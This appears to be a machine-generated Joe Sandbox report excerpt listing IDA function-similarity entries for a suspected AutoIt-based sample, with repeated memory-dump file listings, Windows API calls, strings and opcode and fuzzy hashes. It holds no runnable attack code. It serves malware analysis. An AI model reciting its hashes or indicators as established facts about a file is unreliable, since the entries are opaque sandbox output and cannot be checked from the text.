                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove$_sprintf_strlen
                                                • String ID: %02X
                                                • API String ID: 1921645428-436463671
                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: htonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 3832099526-2422070025
                                                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: InternetOpen
                                                • String ID: <local>
                                                • API String ID: 2038078732-4266983199
                                                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: u,D
                                                • API String ID: 4104443479-3858472334
                                                • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                APIs
                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • wsprintfW.USER32 ref: 0045612A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend_mallocwsprintf
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 1262938277-328681919
                                                • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                APIs
                                                • InternetCloseHandle.WININET(?), ref: 00442663
                                                • InternetCloseHandle.WININET ref: 00442668
                                                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseHandleInternet$ObjectSingleWait
                                                • String ID: aeB
                                                • API String ID: 857135153-906807131
                                                • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                • PostMessageW.USER32(00000000), ref: 00441C05
                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283